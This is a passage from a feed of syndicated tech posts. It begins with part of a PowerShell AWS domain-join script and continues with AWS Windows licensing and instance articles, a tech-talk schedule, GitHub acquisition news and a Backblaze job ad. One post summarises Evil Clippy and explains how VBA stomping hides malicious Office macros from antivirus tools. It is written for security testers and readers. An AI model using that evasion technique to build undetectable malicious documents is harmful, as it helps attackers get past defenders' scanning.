			if (!(Test-Path -Path $GPScrPath -pathType container))
			{ New-Item -ItemType directory -Path $GPScrPath }
			if (!(Test-Path -Path $GPSShdPath -pathType container))
			{ New-Item -ItemType directory -Path $GPSShdPath }
		}
		catch {
			$this.SDLog.WriteLine("Failure creating UnJoin script directory!" )
			$this.SDLog.WriteLine($_)
		}
		#----------------------------------------
		try {
			Set-Content $ScriptFile -Value $ScriptBody
		}
		catch {
			$this.SDLog.WriteLine("Failure saving UnJoin script!" )
			$this.SDLog.WriteLine($_)
		}
		#----------------------------------------
		$RegistryScript =
		@(
			'Windows Registry Editor Version 5.00',
			'[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\Scripts]',
			'[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\Scripts\Shutdown]',
			'[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\Scripts\Shutdown\0]',
			'"GPO-ID"="LocalGPO"',
			'"SOM-ID"="Local"',
			'"FileSysPath"="C:\\Windows\\System32\\GroupPolicy\\Machine"',
			'"DisplayName"="Local Group Policy"',
			'"GPOName"="Local Group Policy"',
			'"PSScriptOrder"=dword:00000001',
			'[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\Scripts\Shutdown\0\0]',
			'"Script"="Shutdown-UnJoin.ps1"',
			'"Parameters"=""',
			'"IsPowershell"=dword:00000001',
			'"ExecTime"=hex(b):00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00',
			'[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\Scripts\Startup]',
			'[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\State\Machine\Scripts]',
			'[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\State\Machine\Scripts\Shutdown]',
			'[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\State\Machine\Scripts\Shutdown\0]',
			'"GPO-ID"="LocalGPO"',
			'"SOM-ID"="Local"',
			'"FileSysPath"="C:\\Windows\\System32\\GroupPolicy\\Machine"',
			'"DisplayName"="Local Group Policy"',
			'"GPOName"="Local Group Policy"',
			'"PSScriptOrder"=dword:00000001',
			'[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\State\Machine\Scripts\Shutdown\0\0]',
			'"Script"="Shutdown-UnJoin.ps1"',
			'"Parameters"=""',
			'"ExecTime"=hex(b):00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00',
			'[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\State\Machine\Scripts\Startup]'
		)
		try {
			[string] $RegistryFile = [System.IO.Path]::Combine($RegFilePath, "OnShutdown.reg")
			Set-Content $RegistryFile -Value $RegistryScript
			&regedit.exe /S "$RegistryFile"
		}
		catch {
			$this.SDLog.WriteLine("Failure creating policy entry in Registry!" )
			$this.SDLog.WriteLine($_)
		}
	}
	#----------------------------------------
	[void] DisableUnJoin() {
		try {
			Set-ItemProperty -Path $this.GPScrShd_0_0  -Name "Parameters" -Value "ignore"
			Set-ItemProperty -Path $this.GPMScrShd_0_0 -Name "Parameters" -Value "ignore"
			&gpupdate /Target:computer /Wait:0
		}
		catch {
			$this.SDLog.WriteLine("Failure in <DisableUnjoin> function!" )
			$this.SDLog.WriteLine($_)
		}
	}
	#----------------------------------------
	[void] EnableUnJoin() {
		try {
			Set-ItemProperty -Path $this.GPScrShd_0_0  -Name "Parameters" -Value "run"
			Set-ItemProperty -Path $this.GPMScrShd_0_0 -Name "Parameters" -Value "run"
			&gpupdate /Target:computer /Wait:0
		}
		catch {
			$this.SDLog.WriteLine("Failure in <EnableUnjoin> function!" )
			$this.SDLog.WriteLine($_)
		}
	}
}
​
[SDManager]$sdm = [SDManager]::new($Log, "C:\ProgramData\Amazon\EC2-Windows\Launch\Scripts", $SecretAD)
​
$log.WriteLine("Loading Secret <" + $SecretAD + ">")
Import-Module AWSPowerShell
try { $SecretObj = (Get-SECSecretValue -SecretId $SecretAD) }
catch {
	$log.WriteLine("Could not load secret <" + $SecretAD + "> - terminating execution")
	return
}
[PSCustomObject]$Secret = ($SecretObj.SecretString  | ConvertFrom-Json)
$log.WriteLine("Domain (from Secret): <" + $Secret.Domain + ">")
# Verify domain membership
$compSys = Get-WmiObject -Class Win32_ComputerSystem
#------------------------------------------------------------------------------
if ( ($compSys.PartOfDomain) -and ($compSys.Domain -eq $Secret.Domain)) {
	$log.WriteLine("Already member of: <" + $compSys.Domain + "> - Verifying RSAT Status")
​
	$RSAT = (Get-WindowsFeature RSAT-AD-PowerShell)
	if ($null -eq $RSAT) {
		$log.WriteLine("<RSAT-AD-PowerShell> feature not found - terminating script")
		return
	}
​
	$log.WriteLine("Enable OnShutdown task to un-join Domain")
	$sdm.EnableUnJoin()
​
	if ( (-Not $RSAT.Installed) -and ($RSAT.InstallState -eq "Available") ) {
		$log.WriteLine("Installing <RSAT-AD-PowerShell> feature")
		Install-WindowsFeature RSAT-AD-PowerShell
	}
​
	$log.WriteLine("Terminating script - ")
	return
}
# Performing Domain Join
$log.WriteLine("Domain Join required")
​
$log.WriteLine("Disable OnShutdown task to avoid reboot loop")
$sdm.DisableUnJoin()
$password = $Secret.Password | ConvertTo-SecureString -asPlainText -Force
$username = $Secret.UserID + "@" + $Secret.Domain
$credential = New-Object System.Management.Automation.PSCredential($username, $password)
​
$log.WriteLine("Attempting to join domain <" + $Secret.Domain + ">")
Add-Computer -DomainName $Secret.Domain -Credential $credential -Restart -Force
​
$log.WriteLine("Requesting restart...")
#------------------------------------------------------------------------------
</powershell>
<persist>true</persist>

 

Malicious MS Office Macro Creator

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2019/05/malicious_ms_of.html

Evil Clippy is a tool for creating malicious Microsoft Office macros:

At BlackHat Asia we released Evil Clippy, a tool which assists red teamers and security testers in creating malicious MS Office documents. Amongst others, Evil Clippy can hide VBA macros, stomp VBA code (via p-code) and confuse popular macro analysis tools. It runs on Linux, OSX and Windows.

The VBA stomping is the most powerful feature, because it gets around antivirus programs:

VBA stomping abuses a feature which is not officially documented: the undocumented PerformanceCache part of each module stream contains compiled pseudo-code (p-code) for the VBA engine. If the MS Office version specified in the _VBA_PROJECT stream matches the MS Office version of the host program (Word or Excel) then the VBA source code in the module stream is ignored and the p-code is executed instead.

In summary: if we know the version of MS Office of a target system (e.g. Office 2016, 32 bit), we can replace our malicious VBA source code with fake code, while the malicious code will still get executed via p-code. In the meantime, any tool analyzing the VBA source code (such as antivirus) is completely fooled.

Windows @ AWS re:Invent 2018

Post Syndicated from Chris Munns original https://aws.amazon.com/blogs/compute/windows-aws-reinvent-2018/

This post is courtesy of Rodney Bozo, Senior Solutions Architect – Microsoft Technologies – AWS

Windows has been a first-class citizen at AWS for over a decade. More enterprises run Windows workloads today on AWS than on any other cloud—according to IDC, it’s over 57%, 2x the next provider. Over this period, we’ve worked with customers across the globe and taken their feedback to build the solutions that best support their Microsoft workloads.

Since 2008, the Microsoft ecosystem on AWS has grown to much more than just running virtual machines. We have solutions for SQL, Active Directory, .NET developers and more, as well as options to bring your licenses to extend the value of your existing investments.

Over the course of the week at AWS re:Invent, we are offering over 75 sessions covering Microsoft technologies in AWS, with a combination of breakout sessions, workshops, chalk talks, and builder sessions.

Find the entire list of Windows and .NET sessions on the session catalog. Here are some you should try not to miss:

Leadership and Management

Windows and Active Directory

SQL

.NET

Looking to get hands-on with Microsoft?

Still looking for more?

We have an extensive list of curated content on the AWS for Microsoft Workloads Self-Study Guide, including case studies, whitepapers, previous re:Invent presentations, reference architectures, and how-to instructional videos. Check it out!

BYOL and Oversubscription

Post Syndicated from Martin Yip original https://aws.amazon.com/blogs/compute/byol-and-oversubscription/

This post is courtesy of Mike Eizensmits, Senior Solutions Architect – AWS

Most AWS customers have a significant Windows Server deployment and are also tied to a Microsoft licensing program. When it comes to Microsoft products, such as Windows Server and SQL Server, licensing models can easily dictate cloud infrastructure solutions. AWS provides several options to support Bring Your Own Licensing (BYOL) as well as EC2 License Included models for non-BYOL workloads. Most enterprise customers have EAs with Microsoft, which can skew their licensing strategy when considering Azure, on-premises, and other cloud service providers such as AWS. BYOL models may be the only reasonable implementation path when entering a new environment or spinning up new applications. Licensing can constitute a significant investment when running workloads on public cloud. To help customers get the maximum benefit from their existing Microsoft licensing, AWS provides multiple options to utilize BYOL. EC2 Dedicated Hosts and Dedicated Instances expose the physical cores of the server to Windows and applications such as SQL Server while allowing licenses with or without Software Assurance to be utilized. Bare Metal as well as VMware on AWS can minimize additional licensing costs.

Dedicated Hosts and Instances

An EC2 Dedicated Host is a dedicated server of a specific Instance Class that is allotted to a single customer, referred to as dedicated tenancy. The density of a host is based on the Instance Size as well as the Instance Type defined at creation. If you chose the M5 Instance Type and the m5.large Instance Size, you would have 48 “slots” available on the host to deploy m5.large Instances. If you chose the m5.xlarge, you would have enough capacity to house 24 Instances. Dedicated Hosts have a fixed number of vCPU and RAM per Instance Type. To deploy Windows on a Dedicated Host, the customer imports an image (vmdk, ova, vhd) using the import-image utility and tags the image as “BYOL” in the command. The BYOL flag dictates whether the image will acquire a license from AWS or from the customer’s existing licensing framework. When dealing with an oversubscribed customer environment, such as an on-premises VMware deployment, the customer has likely oversubscribed the environment with a minimum of 4 vCPU to 1 physical core (4:1). In these environments, Microsoft licensing typically takes place at the host level using physical cores rather than the resources in a provisioned instance (vCPU). An AWS Dedicated Host is oversubscribed 2 vCPU to 1 CPU, meaning each core is Hyper-Threaded. While the math can be performed to show the actual value of a vCPU, customers can be reluctant to modify vCPU configurations to reflect the greater value of the AWS vCPU. Simply matching the quantity of vCPUs to their current environment may be much more costly and expansive than right-sizing the instances for cost optimization.
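
As a rough illustration of the import step described above, the following sketch uses the Import-EC2Image cmdlet from the AWS Tools for PowerShell. The bucket name, key, and disk format are placeholders, and the parameter shapes should be verified against the module documentation before use:

Import-Module AWSPowerShell

# Describe where the uploaded VMDK lives in S3 (placeholder bucket and key)
$container = New-Object Amazon.EC2.Model.ImageDiskContainer
$container.Format = "VMDK"
$container.UserBucket = New-Object Amazon.EC2.Model.UserBucket
$container.UserBucket.S3Bucket = "my-import-bucket"
$container.UserBucket.S3Key = "images/windows-server.vmdk"

# LicenseType BYOL keeps the customer's existing Windows licensing instead of an AWS-provided license
Import-EC2Image -DiskContainer $container -LicenseType "BYOL" -Description "Windows Server BYOL import"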

Below is a sample configuration of a customer interested in migrating to AWS and utilizing BYOL for Microsoft Windows and SQL Server Enterprise Edition. By licensing the 400 physical cores in their cluster, the customer is able to assign any number of vCPU’s to the VM’s deployed on the hosts. Enterprise Architects have spent a considerable amount of time sizing VM’s with the proper resource attributes, so it can be difficult to initiate that process all over again to bring them to the public cloud.

Customer Environment (SQL Server Enterprise Cluster on VMware):

ESXi Nodes in Cluster 10
Cores/Host (2.6GHz) 40
Total Cores in Cluster 400
vCPU assigned (240/host) 2400
Virtual Machines 470
Oversubscription 5:1
Value of vCPU 520 MHz

In this case, the customer has decided not to right-size their VM’s and instead maintain their current vCPU/RAM specifications. This is a Dedicated Host solution to match their vCPU configurations.

AWS Dedicated Host Environment (Dedicated Hosts required to match vCPU of VMware above)

Dedicated Hosts (r4) 38
Cores/Host (2.6GHz) 36
vCPU/Host 64
Total vCPU assigned 2432
Oversubscription 2:1
Value of vCPU 1300 MHz

If the customer is not willing to consider right-sizing their VM’s by assigning fewer, yet higher powered vCPU’s, they face a considerably larger server deployment. After doing the math, we can determine that the Dedicated Host solution has 2.5 times the power of the VMware solution. Following that logic, and math, right-sizing the VM’s would drop the required vCPU count down to 960 vCPU to match their current solution. This would change the number of required r4 Dedicated Hosts from 38 to 15 hosts and slash the SQL licensing requirements for the solution.

EC2 Bare Metal instances and VMware Cloud on AWS

AWS does have other products that lend to the BYOL/oversubscription story. EC2 Bare Metal instances and VMware Cloud on AWS gives the customer full control of the configuration of instances just as they have on-premise. The EC2 Bare Metal instances are built on the Nitro System which is a collection of AWS-built hardware offload and security components that offers high performance networking and storage to EC2 instances. EC2 Bare Metal instances can utilize AWS services such as Amazon Virtual Private Cloud (VPC), Elastic Block Store (EBS), Elastic Load Balancing (ELB), AutoScaling and more. The Nitro configuration gives the customer the ability to install a server Operating System or hypervisor directly on the hardware. By utilizing their own hypervisor, the customer can define and configure their own instance configurations of RAM, disk and vCPU. By surpassing the fixed configurations in the EC2 Dedicated Host environment, Nitro configurations enable migrating highly oversubscribed on-premise workloads.

The VMware Cloud on AWS offering provides organizations the ability to extend and migrate their on-premise vSphere environment to AWS’s scalable and secure Cloud infrastructure. Customers can leverage vSphere, vSAN, NSX and vCenter technologies to extend their data centers and consume AWS services. vMotion provides the ability to live migrate VM’s to AWS with limited or no downtime. While licensing for migrated VM’s does not change at the VM level, it is imperative that the licensing on the new vSphere node be adequate. Since the customer has complete control of the environment, they have the ability to oversubscribe CPU’s to any ratio. By licensing applications such as SQL Server at the host level, oversubscription rates are irrelevant to licensing. If a vSphere node has 40 cores, as long as the 40 cores are licensed, the number of vCPU’s assigned is immaterial. In the VMware environment, all OS’s and applications are BYOL and no licensing will be provided by AWS. Ultimately, this solution is free of the oversubscription burden that affects certain AWS dedicated tenancy options.

Optimize CPU

EC2 Instance Types offer multiple fixed vCPU to memory configurations to match the customer’s workloads and use cases. With Optimize CPUs, customers now have the ability to specify the number of cores that an instance has access to as well as determine whether Hyper-Threading is enabled. Hyper-Threading Technology enables multiple threads to run concurrently on a single Intel Xeon CPU core. Each thread is represented as a virtual CPU (vCPU) on the instance. Controlling the thread and core count is significant for Microsoft SQL Server as it is typically more RAM constrained than compute bound. With Optimize CPUs, you can potentially reduce the number of SQL Server licenses required by specifying a custom number of vCPUs. SQL Server on Amazon EC2 is often licensed per virtual core. EC2 vCPUs are the equivalent of virtual cores. When licensing with virtual cores on EC2, the number of active vCPUs provisioned through Optimize CPUs may indicate the number of SQL Server licenses required. For example, if you have a SQL Standard build that needs the RAM and network capabilities of an r4.4xlarge but not the 16 vCPUs that come configured on it, you can define the Optimize CPU options in the CLI or API at launch to disable Hyper-Threading and limit the instance to 1, 2, 3, 4, 5, 6, 7 or 8 cores. This example would cut licensing costs substantially. The Optimize CPU feature is available for new instance launches in all AWS public regions. To benefit from Optimize CPUs, you can bring SQL Server licenses to Amazon EC2 and use them on EC2 default tenancy or on allocated instances on an EC2 Dedicated Host or an EC2 Dedicated Instance. For a list of supported instance types and valid CPU counts, see the instance type documentation.
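
As an example of the launch-time setting described above, the following sketch limits an r4.4xlarge to 8 cores with Hyper-Threading disabled using the AWS Tools for PowerShell. The AMI ID is a placeholder and the CpuOption_* parameter names are my best understanding of the New-EC2Instance cmdlet, so confirm them in the current documentation:

# Launch an r4.4xlarge exposing only 8 physical cores and 1 thread per core (8 vCPUs total)
New-EC2Instance -ImageId "ami-0123456789abcdef0" `
                -InstanceType "r4.4xlarge" `
                -CpuOption_CoreCount 8 `
                -CpuOption_ThreadsPerCore 1 `
                -MinCount 1 -MaxCount 1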

In this post, we’ve covered three AWS scenarios and how they address specific areas of the BYOL and CPU oversubscription scenario, as well as how Optimize CPUs can help cut licensing costs. EC2 Dedicated Hosts are generally the first choice in the Microsoft BYOL realm unless the customer is absolutely unwilling to right-size their highly oversubscribed instances. EC2 Bare Metal instances provide the customer the ability to configure all aspects of their hypervisor of choice and maintain any oversubscription that exists in their environment. This is a very popular choice that requires little change and ultimately gets their workloads to the AWS Cloud. The VMware Cloud on AWS option is sold and provisioned by VMware. For users that are current VMware customers, this service allows them to bridge the gap between their on-premises data center and AWS while providing a seamless migration path to the Cloud using their current toolsets.

EC2 Instance Update – M5 Instances with Local NVMe Storage (M5d)

Post Syndicated from Jeff Barr original https://aws.amazon.com/blogs/aws/ec2-instance-update-m5-instances-with-local-nvme-storage-m5d/

Earlier this month we launched the C5 Instances with Local NVMe Storage and I told you that we would be doing the same for additional instance types in the near future!

Today we are introducing M5 instances equipped with local NVMe storage. Available for immediate use in 5 regions, these instances are a great fit for workloads that require a balance of compute and memory resources. Here are the specs:

Instance Name vCPUs RAM Local Storage EBS-Optimized Bandwidth Network Bandwidth
m5d.large 2 8 GiB 1 x 75 GB NVMe SSD Up to 2.120 Gbps Up to 10 Gbps
m5d.xlarge 4 16 GiB 1 x 150 GB NVMe SSD Up to 2.120 Gbps Up to 10 Gbps
m5d.2xlarge 8 32 GiB 1 x 300 GB NVMe SSD Up to 2.120 Gbps Up to 10 Gbps
m5d.4xlarge 16 64 GiB 1 x 600 GB NVMe SSD 2.210 Gbps Up to 10 Gbps
m5d.12xlarge 48 192 GiB 2 x 900 GB NVMe SSD 5.0 Gbps 10 Gbps
m5d.24xlarge 96 384 GiB 4 x 900 GB NVMe SSD 10.0 Gbps 25 Gbps

The M5d instances are powered by Custom Intel® Xeon® Platinum 8175M series processors running at 2.5 GHz, including support for AVX-512.

You can use any AMI that includes drivers for the Elastic Network Adapter (ENA) and NVMe; this includes the latest Amazon Linux, Microsoft Windows (Server 2008 R2, Server 2012, Server 2012 R2 and Server 2016), Ubuntu, RHEL, SUSE, and CentOS AMIs.

Here are a couple of things to keep in mind about the local NVMe storage on the M5d instances:

Naming – You don’t have to specify a block device mapping in your AMI or during the instance launch; the local storage will show up as one or more devices (/dev/nvme*1 on Linux) after the guest operating system has booted.

Encryption – Each local NVMe device is hardware encrypted using the XTS-AES-256 block cipher and a unique key. Each key is destroyed when the instance is stopped or terminated.

Lifetime – Local NVMe devices have the same lifetime as the instance they are attached to, and do not stick around after the instance has been stopped or terminated.

Available Now
M5d instances are available in On-Demand, Reserved Instance, and Spot form in the US East (N. Virginia), US West (Oregon), EU (Ireland), US East (Ohio), and Canada (Central) Regions. Prices vary by Region, and are just a bit higher than for the equivalent M5 instances.

Jeff;

 

AWS Online Tech Talks – June 2018

Post Syndicated from Devin Watson original https://aws.amazon.com/blogs/aws/aws-online-tech-talks-june-2018/

AWS Online Tech Talks – June 2018

Join us this month to learn about AWS services and solutions. New this month, we have a fireside chat with the GM of Amazon WorkSpaces and our 2nd episode of the “How to re:Invent” series. We’ll also cover best practices, deep dives, use cases and more! Join us and register today!

Note – All sessions are free and in Pacific Time.

Tech talks featured this month:

 

Analytics & Big Data

June 18, 2018 | 11:00 AM – 11:45 AM PT – Get Started with Real-Time Streaming Data in Under 5 Minutes – Learn how to use Amazon Kinesis to capture, store, and analyze streaming data in real-time including IoT device data, VPC flow logs, and clickstream data.
June 20, 2018 | 11:00 AM – 11:45 AM PT – Insights For Everyone – Deploying Data across your Organization – Learn how to deploy data at scale using AWS Analytics and QuickSight’s new reader role and usage based pricing.

 

AWS re:Invent
June 13, 2018 | 05:00 PM – 05:30 PM PT – Episode 2: AWS re:Invent Breakout Content Secret Sauce – Hear from one of our own AWS content experts as we dive deep into the re:Invent content strategy and how we maintain a high bar.
Compute

June 25, 2018 | 01:00 PM – 01:45 PM PT – Accelerating Containerized Workloads with Amazon EC2 Spot Instances – Learn how to efficiently deploy containerized workloads and easily manage clusters at any scale at a fraction of the cost with Spot Instances.

June 26, 2018 | 01:00 PM – 01:45 PM PT – Ensuring Your Windows Server Workloads Are Well-Architected – Get the benefits, best practices and tools on running your Microsoft Workloads on AWS leveraging a well-architected approach.

 

Containers
June 25, 2018 | 09:00 AM – 09:45 AM PT – Running Kubernetes on AWS – Learn about the basics of running Kubernetes on AWS including how to set up masters, networking, and security, and add auto-scaling to your cluster.

 

Databases

June 18, 2018 | 01:00 PM – 01:45 PM PT – Oracle to Amazon Aurora Migration, Step by Step – Learn how to migrate your Oracle database to Amazon Aurora.
DevOps

June 20, 2018 | 09:00 AM – 09:45 AM PT – Set Up a CI/CD Pipeline for Deploying Containers Using the AWS Developer Tools – Learn how to set up a CI/CD pipeline for deploying containers using the AWS Developer Tools.

 

Enterprise & Hybrid
June 18, 2018 | 09:00 AM – 09:45 AM PT – De-risking Enterprise Migration with AWS Managed Services – Learn how enterprise customers are de-risking cloud adoption with AWS Managed Services.

June 19, 2018 | 11:00 AM – 11:45 AM PT – Launch AWS Faster using Automated Landing Zones – Learn how the AWS Landing Zone can automate the set up of best practice baselines when setting up new AWS environments.

 

AWS Environments

June 21, 2018 | 11:00 AM – 11:45 AM PT – Leading Your Team Through a Cloud Transformation – Learn how you can help lead your organization through a cloud transformation.

June 21, 2018 | 01:00 PM – 01:45 PM PT – Enabling New Retail Customer Experiences with Big Data – Learn how AWS can help retailers realize actual value from their big data and deliver on differentiated retail customer experiences.

June 28, 2018 | 01:00 PM – 01:45 PM PT – Fireside Chat: End User Collaboration on AWS – Learn how End User Compute services can help you deliver access to desktops and applications anywhere, anytime, using any device.
IoT

June 27, 2018 | 11:00 AM – 11:45 AM PT – AWS IoT in the Connected Home – Learn how to use AWS IoT to build innovative Connected Home products.

 

Machine Learning

June 19, 2018 | 09:00 AM – 09:45 AM PT – Integrating Amazon SageMaker into your Enterprise – Learn how to integrate Amazon SageMaker and other AWS Services within an Enterprise environment.

June 21, 2018 | 09:00 AM – 09:45 AM PT – Building Text Analytics Applications on AWS using Amazon Comprehend – Learn how you can unlock the value of your unstructured data with NLP-based text analytics.

 

Management Tools

June 20, 2018 | 01:00 PM – 01:45 PM PT – Optimizing Application Performance and Costs with Auto Scaling – Learn how selecting the right scaling option can help optimize application performance and costs.

 

Mobile
June 25, 2018 | 11:00 AM – 11:45 AM PT – Drive User Engagement with Amazon Pinpoint – Learn how Amazon Pinpoint simplifies and streamlines effective user engagement.

 

Security, Identity & Compliance

June 26, 2018 | 09:00 AM – 09:45 AM PT – Understanding AWS Secrets Manager – Learn how AWS Secrets Manager helps you rotate and manage access to secrets centrally.
June 28, 2018 | 09:00 AM – 09:45 AM PT – Using Amazon Inspector to Discover Potential Security Issues – See how Amazon Inspector can be used to discover security issues of your instances.

 

Serverless

June 19, 2018 | 01:00 PM – 01:45 PM PT – Productionize Serverless Application Building and Deployments with AWS SAM – Learn expert tips and techniques for building and deploying serverless applications at scale with AWS SAM.

 

Storage

June 26, 2018 | 11:00 AM – 11:45 AM PT – Deep Dive: Hybrid Cloud Storage with AWS Storage Gateway – Learn how you can reduce your on-premises infrastructure by using the AWS Storage Gateway to connect your applications to the scalable and reliable AWS storage services.
June 27, 2018 | 01:00 PM – 01:45 PM PT – Changing the Game: Extending Compute Capabilities to the Edge – Discover how to change the game for IIoT and edge analytics applications with AWS Snowball Edge plus enhanced Compute instances.
June 28, 2018 | 11:00 AM – 11:45 AM PT – Big Data and Analytics Workloads on Amazon EFS – Get best practices and deployment advice for running big data and analytics workloads on Amazon EFS.

Microsoft acquires GitHub

Post Syndicated from corbet original https://lwn.net/Articles/756443/rss

Here’s the press release announcing Microsoft’s agreement to acquire GitHub for a mere $7.5 billion. “GitHub will retain its developer-first ethos and will operate independently to provide an open platform for all developers in all industries. Developers will continue to be able to use the programming languages, tools and operating systems of their choice for their projects — and will still be able to deploy their code to any operating system, any cloud and any device.”

Hiring a Director of Sales

Post Syndicated from Yev original https://www.backblaze.com/blog/hiring-a-director-of-sales/

Backblaze is hiring a Director of Sales. This is a critical role for Backblaze as we continue to grow the team. We need a strong leader who has experience in scaling a sales team and who has an excellent track record for exceeding goals by selling Software as a Service (SaaS) solutions. In addition, this leader will need to be highly motivated, as well as able to create and develop a highly-motivated, success oriented sales team that has fun and enjoys what they do.

The History of Backblaze from our CEO
In 2007, after a friend’s computer crash caused her some suffering, we realized that with every photo, video, song, and document going digital, everyone would eventually lose all of their information. Five of us quit our jobs to start a company with the goal of making it easy for people to back up their data.

Like many startups, for a while we worked out of a co-founder’s one-bedroom apartment. Unlike most startups, we made an explicit agreement not to raise funding during the first year. We would then touch base every six months and decide whether to raise or not. We wanted to focus on building the company and the product, not on pitching and slide decks. And critically, we wanted to build a culture that understood money comes from customers, not the magical VC giving tree. Over the course of 5 years we built a profitable, multi-million dollar revenue business — and only then did we raise a VC round.

Fast forward 10 years later and our world looks quite different. You’ll have some fantastic assets to work with:

  • A brand millions recognize for openness, ease-of-use, and affordability.
  • A computer backup service that stores over 500 petabytes of data, has recovered over 30 billion files for hundreds of thousands of paying customers — most of whom self-identify as being the people that find and recommend technology products to their friends.
  • Our B2 service that provides the lowest cost cloud storage on the planet at 1/4th the price Amazon, Google or Microsoft charges. While being a newer product on the market, it already has over 100,000 IT and developers signed up as well as an ecosystem building up around it.
  • A growing, profitable and cash-flow positive company.
  • And last, but most definitely not least: a great sales team.

You might be saying, “sounds like you’ve got this under control — why do you need me?” Don’t be misled. We need you. Here’s why:

  • We have a great team, but we are in the process of expanding and we need to develop a structure that will easily scale and provide the most success to drive revenue.
  • We just launched our outbound sales efforts and we need someone to help develop that into a fully successful program that’s building a strong pipeline and closing business.
  • We need someone to work with the marketing department and figure out how to generate more inbound opportunities that the sales team can follow up on and close.
  • We need someone who will work closely in developing the skills of our current sales team and build a path for career growth and advancement.
  • We want someone to manage our Customer Success program.

So that’s a bit about us. What are we looking for in you?

Experience: As a sales leader, you will strategically build and drive the territory’s sales pipeline by assembling and leading a skilled team of sales professionals. This leader should be familiar with generating, developing and closing software subscription (SaaS) opportunities. We are looking for a self-starter who can manage a team and make an immediate impact selling our Backup and Cloud Storage solutions. In this role, the sales leader will work closely with the VP of Sales, marketing staff, and service staff to develop and implement specific strategic plans to achieve and exceed revenue targets, including new business acquisition as well as building out our customer success program.

Leadership: We have an experienced team who’s brought us to where we are today. You need to have the people and management skills to get them excited about working with you. You need to be a strong leader and compassionate about developing and supporting your team.

Data driven and creative: The data has to show something makes sense before we scale it up. However, without creativity, it’s easy to say “the data shows it’s impossible” or to find a local maximum. Whether it’s deciding how to scale the team, figuring out what our outbound sales efforts should look like or putting a plan in place to develop the team for career growth, we’ve seen a bit of creativity get us places a few extra dollars couldn’t.

Jive with our culture: Strong leaders affect culture and the person we hire for this role may well shape, not only fit into, ours. But to shape the culture you have to be accepted by the organism, which means a certain set of shared values. We default to openness with our team, our customers, and everyone if possible. We love initiative — without arrogance or dictatorship. We work to create a place people enjoy showing up to work. That doesn’t mean ping pong tables and foosball (though we do try to have perks & fun), but it means people are friendly, non-political, working to build a good service but also a good place to work.

Do the work: Ideas and strategy are critical, but good execution makes them happen. We’re looking for someone who can help the team execute both from the perspective of being capable of guiding and organizing, but also someone who is hands-on themselves.

Additional Responsibilities needed for this role:

  • Recruit, coach, mentor, manage and lead a team of sales professionals to achieve yearly sales targets. This includes closing new business and expanding upon existing clientele.
  • Expand the customer success program to provide the best customer experience possible resulting in upsell opportunities and a high retention rate.
  • Develop effective sales strategies and deliver compelling product demonstrations and sales pitches.
  • Acquire and develop the appropriate sales tools to make the team efficient in their daily work flow.
  • Apply a thorough understanding of the marketplace, industry trends, funding developments, and products to all management activities and strategic sales decisions.
  • Ensure that sales department operations function smoothly, with the goal of facilitating sales and/or closings; operational responsibilities include accurate pipeline reporting and sales forecasts.
  • This position will report directly to the VP of Sales and will be staffed in our headquarters in San Mateo, CA.

Requirements:

  • 7 – 10+ years of successful sales leadership experience as measured by sales performance against goals.
  • Experience in developing skill sets and providing career growth and opportunities through advancement of team members.
  • Background in selling SaaS technologies with a strong track record of success.
  • Strong presentation and communication skills.
  • Must be able to travel occasionally nationwide.
  • BA/BS degree required

Think you want to join us on this adventure?
Send an email to jobscontact@backblaze.com with the subject “Director of Sales.” (Recruiters and agencies, please don’t email us.) Include a resume and answer these two questions:

  1. How would you approach evaluating the current sales team and what is your process for developing a growth strategy to scale the team?
  2. What are the goals you would set for yourself in the 3 month and 1-year timeframes?

Thank you for taking the time to read this and I hope that this sounds like the opportunity for which you’ve been waiting.

Backblaze is an Equal Opportunity Employer.

The post Hiring a Director of Sales appeared first on Backblaze Blog | Cloud Storage & Cloud Backup.